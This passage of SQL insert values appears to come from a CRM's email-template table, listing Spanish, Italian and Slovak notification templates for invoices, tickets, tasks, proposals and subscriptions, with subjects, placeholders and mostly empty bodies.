(1651, 'subscriptions', 'customer-subscribed-to-staff', 'spanish', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [spanish]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1652, 'client', 'contact-verification-email', 'spanish', 'Email Verification (Sent to Contact After Registration) [spanish]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1653, 'client', 'new-customer-profile-file-uploaded-to-staff', 'spanish', 'New Customer Profile File(s) Uploaded (Sent to Staff) [spanish]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1654, 'staff', 'event-notification-to-staff', 'spanish', 'Event Notification (Calendar) [spanish]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1655, 'subscriptions', 'subscription-payment-requires-action', 'spanish', 'Credit Card Authorization Required - SCA [spanish]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1656, 'invoice', 'invoice-due-notice', 'spanish', 'Invoice Due Notice [spanish]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1657, 'estimate_request', 'estimate-request-submitted-to-staff', 'spanish', 'Estimate Request Submitted (Sent to Staff) [spanish]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1658, 'estimate_request', 'estimate-request-assigned', 'spanish', 'Estimate Request Assigned (Sent to Staff) [spanish]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1659, 'estimate_request', 'estimate-request-received-to-user', 'spanish', 'Estimate Request Received (Sent to User) [spanish]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1660, 'client', 'new-client-created', 'italian', 'New Contact Added/Registered (Welcome Email) [italian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1661, 'invoice', 'invoice-send-to-client', 'italian', 'Send Invoice to Customer [italian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1662, 'ticket', 'new-ticket-opened-admin', 'italian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [italian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1663, 'ticket', 'ticket-reply', 'italian', 'Ticket Reply (Sent to Customer) [italian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1664, 'ticket', 'ticket-autoresponse', 'italian', 'New Ticket Opened - Autoresponse [italian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1665, 'invoice', 'invoice-payment-recorded', 'italian', 'Invoice Payment Recorded (Sent to Customer) [italian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1666, 'invoice', 'invoice-overdue-notice', 'italian', 'Invoice Overdue Notice [italian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1667, 'invoice', 'invoice-already-send', 'italian', 'Invoice Already Sent to Customer [italian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1668, 'ticket', 'new-ticket-created-staff', 'italian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [italian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1669, 'estimate', 'estimate-send-to-client', 'italian', 'Send Estimate to Customer [italian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1670, 'ticket', 'ticket-reply-to-admin', 'italian', 'Ticket Reply (Sent to Staff) [italian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1671, 'estimate', 'estimate-already-send', 'italian', 'Estimate Already Sent to Customer [italian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1672, 'contract', 'contract-expiration', 'italian', 'Contract Expiration Reminder (Sent to Customer Contacts) [italian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1673, 'tasks', 'task-assigned', 'italian', 'New Task Assigned (Sent to Staff) [italian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1674, 'tasks', 'task-added-as-follower', 'italian', 'Staff Member Added as Follower on Task (Sent to Staff) [italian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1675, 'tasks', 'task-commented', 'italian', 'New Comment on Task (Sent to Staff) [italian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1676, 'tasks', 'task-added-attachment', 'italian', 'New Attachment(s) on Task (Sent to Staff) [italian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1677, 'estimate', 'estimate-declined-to-staff', 'italian', 'Estimate Declined (Sent to Staff) [italian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1678, 'estimate', 'estimate-accepted-to-staff', 'italian', 'Estimate Accepted (Sent to Staff) [italian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1679, 'proposals', 'proposal-client-accepted', 'italian', 'Customer Action - Accepted (Sent to Staff) [italian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1680, 'proposals', 'proposal-send-to-customer', 'italian', 'Send Proposal to Customer [italian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1681, 'proposals', 'proposal-client-declined', 'italian', 'Customer Action - Declined (Sent to Staff) [italian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1682, 'proposals', 'proposal-client-thank-you', 'italian', 'Thank You Email (Sent to Customer After Accept) [italian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1683, 'proposals', 'proposal-comment-to-client', 'italian', 'New Comment  (Sent to Customer/Lead) [italian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1684, 'proposals', 'proposal-comment-to-admin', 'italian', 'New Comment (Sent to Staff)  [italian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1685, 'estimate', 'estimate-thank-you-to-customer', 'italian', 'Thank You Email (Sent to Customer After Accept) [italian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1686, 'tasks', 'task-deadline-notification', 'italian', 'Task Deadline Reminder - Sent to Assigned Members [italian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1687, 'contract', 'send-contract', 'italian', 'Send Contract to Customer [italian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1688, 'invoice', 'invoice-payment-recorded-to-staff', 'italian', 'Invoice Payment Recorded (Sent to Staff) [italian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1689, 'ticket', 'auto-close-ticket', 'italian', 'Auto Close Ticket [italian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1690, 'project', 'new-project-discussion-created-to-staff', 'italian', 'New Project Discussion (Sent to Project Members) [italian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1691, 'project', 'new-project-discussion-created-to-customer', 'italian', 'New Project Discussion (Sent to Customer Contacts) [italian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1692, 'project', 'new-project-file-uploaded-to-customer', 'italian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [italian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1693, 'project', 'new-project-file-uploaded-to-staff', 'italian', 'New Project File(s) Uploaded (Sent to Project Members) [italian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1694, 'project', 'new-project-discussion-comment-to-customer', 'italian', 'New Discussion Comment  (Sent to Customer Contacts) [italian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1695, 'project', 'new-project-discussion-comment-to-staff', 'italian', 'New Discussion Comment (Sent to Project Members) [italian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1696, 'project', 'staff-added-as-project-member', 'italian', 'Staff Added as Project Member [italian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1697, 'estimate', 'estimate-expiry-reminder', 'italian', 'Estimate Expiration Reminder [italian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1698, 'proposals', 'proposal-expiry-reminder', 'italian', 'Proposal Expiration Reminder [italian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1699, 'staff', 'new-staff-created', 'italian', 'New Staff Created (Welcome Email) [italian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1700, 'client', 'contact-forgot-password', 'italian', 'Forgot Password [italian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1701, 'client', 'contact-password-reseted', 'italian', 'Password Reset - Confirmation [italian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1702, 'client', 'contact-set-password', 'italian', 'Set New Password [italian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1703, 'staff', 'staff-forgot-password', 'italian', 'Forgot Password [italian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1704, 'staff', 'staff-password-reseted', 'italian', 'Password Reset - Confirmation [italian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1705, 'project', 'assigned-to-project', 'italian', 'New Project Created (Sent to Customer Contacts) [italian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1706, 'tasks', 'task-added-attachment-to-contacts', 'italian', 'New Attachment(s) on Task (Sent to Customer Contacts) [italian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1707, 'tasks', 'task-commented-to-contacts', 'italian', 'New Comment on Task (Sent to Customer Contacts) [italian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1708, 'leads', 'new-lead-assigned', 'italian', 'New Lead Assigned to Staff Member [italian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1709, 'client', 'client-statement', 'italian', 'Statement - Account Summary [italian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1710, 'ticket', 'ticket-assigned-to-admin', 'italian', 'New Ticket Assigned (Sent to Staff) [italian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1711, 'client', 'new-client-registered-to-admin', 'italian', 'New Customer Registration (Sent to admins) [italian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1712, 'leads', 'new-web-to-lead-form-submitted', 'italian', 'Web to lead form submitted - Sent to lead [italian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1713, 'staff', 'two-factor-authentication', 'italian', 'Two Factor Authentication [italian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1714, 'project', 'project-finished-to-customer', 'italian', 'Project Marked as Finished (Sent to Customer Contacts) [italian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1715, 'credit_note', 'credit-note-send-to-client', 'italian', 'Send Credit Note To Email [italian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1716, 'tasks', 'task-status-change-to-staff', 'italian', 'Task Status Changed (Sent to Staff) [italian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1717, 'tasks', 'task-status-change-to-contacts', 'italian', 'Task Status Changed (Sent to Customer Contacts) [italian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1718, 'staff', 'reminder-email-staff', 'italian', 'Staff Reminder Email [italian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1719, 'contract', 'contract-comment-to-client', 'italian', 'New Comment  (Sent to Customer Contacts) [italian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1720, 'contract', 'contract-comment-to-admin', 'italian', 'New Comment (Sent to Staff)  [italian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1721, 'subscriptions', 'send-subscription', 'italian', 'Send Subscription to Customer [italian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1722, 'subscriptions', 'subscription-payment-failed', 'italian', 'Subscription Payment Failed [italian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1723, 'subscriptions', 'subscription-canceled', 'italian', 'Subscription Canceled (Sent to customer primary contact) [italian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1724, 'subscriptions', 'subscription-payment-succeeded', 'italian', 'Subscription Payment Succeeded (Sent to customer primary contact) [italian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1725, 'contract', 'contract-expiration-to-staff', 'italian', 'Contract Expiration Reminder (Sent to Staff) [italian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1726, 'gdpr', 'gdpr-removal-request', 'italian', 'Removal Request From Contact (Sent to administrators) [italian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1727, 'gdpr', 'gdpr-removal-request-lead', 'italian', 'Removal Request From Lead (Sent to administrators) [italian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1728, 'client', 'client-registration-confirmed', 'italian', 'Customer Registration Confirmed [italian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1729, 'contract', 'contract-signed-to-staff', 'italian', 'Contract Signed (Sent to Staff) [italian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1730, 'subscriptions', 'customer-subscribed-to-staff', 'italian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [italian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1731, 'client', 'contact-verification-email', 'italian', 'Email Verification (Sent to Contact After Registration) [italian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1732, 'client', 'new-customer-profile-file-uploaded-to-staff', 'italian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [italian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1733, 'staff', 'event-notification-to-staff', 'italian', 'Event Notification (Calendar) [italian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(1734, 'subscriptions', 'subscription-payment-requires-action', 'italian', 'Credit Card Authorization Required - SCA [italian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1735, 'invoice', 'invoice-due-notice', 'italian', 'Invoice Due Notice [italian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1736, 'estimate_request', 'estimate-request-submitted-to-staff', 'italian', 'Estimate Request Submitted (Sent to Staff) [italian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(1737, 'estimate_request', 'estimate-request-assigned', 'italian', 'Estimate Request Assigned (Sent to Staff) [italian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1738, 'estimate_request', 'estimate-request-received-to-user', 'italian', 'Estimate Request Received (Sent to User) [italian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1739, 'client', 'new-client-created', 'slovak', 'New Contact Added/Registered (Welcome Email) [slovak]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1740, 'invoice', 'invoice-send-to-client', 'slovak', 'Send Invoice to Customer [slovak]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(1741, 'ticket', 'new-ticket-opened-admin', 'slovak', 'New Ticket Opened (Opened by Staff, Sent to Customer) [slovak]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1742, 'ticket', 'ticket-reply', 'slovak', 'Ticket Reply (Sent to Customer) [slovak]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1743, 'ticket', 'ticket-autoresponse', 'slovak', 'New Ticket Opened - Autoresponse [slovak]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(1744, 'invoice', 'invoice-payment-recorded', 'slovak', 'Invoice Payment Recorded (Sent to Customer) [slovak]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(1745, 'invoice', 'invoice-overdue-notice', 'slovak', 'Invoice Overdue Notice [slovak]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1746, 'invoice', 'invoice-already-send', 'slovak', 'Invoice Already Sent to Customer [slovak]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1747, 'ticket', 'new-ticket-created-staff', 'slovak', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [slovak]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(1748, 'estimate', 'estimate-send-to-client', 'slovak', 'Send Estimate to Customer [slovak]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(1749, 'ticket', 'ticket-reply-to-admin', 'slovak', 'Ticket Reply (Sent to Staff) [slovak]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(1750, 'estimate', 'estimate-already-send', 'slovak', 'Estimate Already Sent to Customer [slovak]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(1751, 'contract', 'contract-expiration', 'slovak', 'Contract Expiration Reminder (Sent to Customer Contacts) [slovak]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1752, 'tasks', 'task-assigned', 'slovak', 'New Task Assigned (Sent to Staff) [slovak]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1753, 'tasks', 'task-added-as-follower', 'slovak', 'Staff Member Added as Follower on Task (Sent to Staff) [slovak]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(1754, 'tasks', 'task-commented', 'slovak', 'New Comment on Task (Sent to Staff) [slovak]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1755, 'tasks', 'task-added-attachment', 'slovak', 'New Attachment(s) on Task (Sent to Staff) [slovak]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1756, 'estimate', 'estimate-declined-to-staff', 'slovak', 'Estimate Declined (Sent to Staff) [slovak]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1757, 'estimate', 'estimate-accepted-to-staff', 'slovak', 'Estimate Accepted (Sent to Staff) [slovak]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1758, 'proposals', 'proposal-client-accepted', 'slovak', 'Customer Action - Accepted (Sent to Staff) [slovak]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1759, 'proposals', 'proposal-send-to-customer', 'slovak', 'Send Proposal to Customer [slovak]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1760, 'proposals', 'proposal-client-declined', 'slovak', 'Customer Action - Declined (Sent to Staff) [slovak]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1761, 'proposals', 'proposal-client-thank-you', 'slovak', 'Thank You Email (Sent to Customer After Accept) [slovak]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1762, 'proposals', 'proposal-comment-to-client', 'slovak', 'New Comment  (Sent to Customer/Lead) [slovak]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1763, 'proposals', 'proposal-comment-to-admin', 'slovak', 'New Comment (Sent to Staff)  [slovak]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1764, 'estimate', 'estimate-thank-you-to-customer', 'slovak', 'Thank You Email (Sent to Customer After Accept) [slovak]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(1765, 'tasks', 'task-deadline-notification', 'slovak', 'Task Deadline Reminder - Sent to Assigned Members [slovak]', 'Task Deadline Reminder', '{email_signature}', '{companyname} | CRM', '', 0, 1, 0),
(1766, 'contract', 'send-contract', 'slovak', 'Send Contract to Customer [slovak]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1767, 'invoice', 'invoice-payment-recorded-to-staff', 'slovak', 'Invoice Payment Recorded (Sent to Staff) [slovak]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(1768, 'ticket', 'auto-close-ticket', 'slovak', 'Auto Close Ticket [slovak]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1769, 'project', 'new-project-discussion-created-to-staff', 'slovak', 'New Project Discussion (Sent to Project Members) [slovak]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1770, 'project', 'new-project-discussion-created-to-customer', 'slovak', 'New Project Discussion (Sent to Customer Contacts) [slovak]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1771, 'project', 'new-project-file-uploaded-to-customer', 'slovak', 'New Project File(s) Uploaded (Sent to Customer Contacts) [slovak]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1772, 'project', 'new-project-file-uploaded-to-staff', 'slovak', 'New Project File(s) Uploaded (Sent to Project Members) [slovak]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1773, 'project', 'new-project-discussion-comment-to-customer', 'slovak', 'New Discussion Comment  (Sent to Customer Contacts) [slovak]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1774, 'project', 'new-project-discussion-comment-to-staff', 'slovak', 'New Discussion Comment (Sent to Project Members) [slovak]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1775, 'project', 'staff-added-as-project-member', 'slovak', 'Staff Added as Project Member [slovak]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1776, 'estimate', 'estimate-expiry-reminder', 'slovak', 'Estimate Expiration Reminder [slovak]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(1777, 'proposals', 'proposal-expiry-reminder', 'slovak', 'Proposal Expiration Reminder [slovak]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1778, 'staff', 'new-staff-created', 'slovak', 'New Staff Created (Welcome Email) [slovak]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(1779, 'client', 'contact-forgot-password', 'slovak', 'Forgot Password [slovak]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1780, 'client', 'contact-password-reseted', 'slovak', 'Password Reset - Confirmation [slovak]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1781, 'client', 'contact-set-password', 'slovak', 'Set New Password [slovak]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1782, 'staff', 'staff-forgot-password', 'slovak', 'Forgot Password [slovak]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1783, 'staff', 'staff-password-reseted', 'slovak', 'Password Reset - Confirmation [slovak]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1784, 'project', 'assigned-to-project', 'slovak', 'New Project Created (Sent to Customer Contacts) [slovak]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1785, 'tasks', 'task-added-attachment-to-contacts', 'slovak', 'New Attachment(s) on Task (Sent to Customer Contacts) [slovak]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1786, 'tasks', 'task-commented-to-contacts', 'slovak', 'New Comment on Task (Sent to Customer Contacts) [slovak]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1787, 'leads', 'new-lead-assigned', 'slovak', 'New Lead Assigned to Staff Member [slovak]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(1788, 'client', 'client-statement', 'slovak', 'Statement - Account Summary [slovak]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(1789, 'ticket', 'ticket-assigned-to-admin', 'slovak', 'New Ticket Assigned (Sent to Staff) [slovak]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(1790, 'client', 'new-client-registered-to-admin', 'slovak', 'New Customer Registration (Sent to admins) [slovak]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1791, 'leads', 'new-web-to-lead-form-submitted', 'slovak', 'Web to lead form submitted - Sent to lead [slovak]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(1792, 'staff', 'two-factor-authentication', 'slovak', 'Two Factor Authentication [slovak]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1793, 'project', 'project-finished-to-customer', 'slovak', 'Project Marked as Finished (Sent to Customer Contacts) [slovak]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1794, 'credit_note', 'credit-note-send-to-client', 'slovak', 'Send Credit Note To Email [slovak]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1795, 'tasks', 'task-status-change-to-staff', 'slovak', 'Task Status Changed (Sent to Staff) [slovak]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(1796, 'tasks', 'task-status-change-to-contacts', 'slovak', 'Task Status Changed (Sent to Customer Contacts) [slovak]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1797, 'staff', 'reminder-email-staff', 'slovak', 'Staff Reminder Email [slovak]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1798, 'contract', 'contract-comment-to-client', 'slovak', 'New Comment  (Sent to Customer Contacts) [slovak]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1799, 'contract', 'contract-comment-to-admin', 'slovak', 'New Comment (Sent to Staff)  [slovak]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1800, 'subscriptions', 'send-subscription', 'slovak', 'Send Subscription to Customer [slovak]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(1801, 'subscriptions', 'subscription-payment-failed', 'slovak', 'Subscription Payment Failed [slovak]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1802, 'subscriptions', 'subscription-canceled', 'slovak', 'Subscription Canceled (Sent to customer primary contact) [slovak]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1803, 'subscriptions', 'subscription-payment-succeeded', 'slovak', 'Subscription Payment Succeeded (Sent to customer primary contact) [slovak]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1804, 'contract', 'contract-expiration-to-staff', 'slovak', 'Contract Expiration Reminder (Sent to Staff) [slovak]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1805, 'gdpr', 'gdpr-removal-request', 'slovak', 'Removal Request From Contact (Sent to administrators) [slovak]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1806, 'gdpr', 'gdpr-removal-request-lead', 'slovak', 'Removal Request From Lead (Sent to administrators) [slovak]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1807, 'client', 'client-registration-confirmed', 'slovak', 'Customer Registration Confirmed [slovak]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1808, 'contract', 'contract-signed-to-staff', 'slovak', 'Contract Signed (Sent to Staff) [slovak]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1809, 'subscriptions', 'customer-subscribed-to-staff', 'slovak', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [slovak]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(1810, 'client', 'contact-verification-email', 'slovak', 'Email Verification (Sent to Contact After Registration) [slovak]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1811, 'client', 'new-customer-profile-file-uploaded-to-staff', 'slovak', 'New Customer Profile File(s) Uploaded (Sent to Staff) [slovak]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(1812, 'staff', 'event-notification-to-staff', 'slovak', 'Event Notification (Calendar) [slovak]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
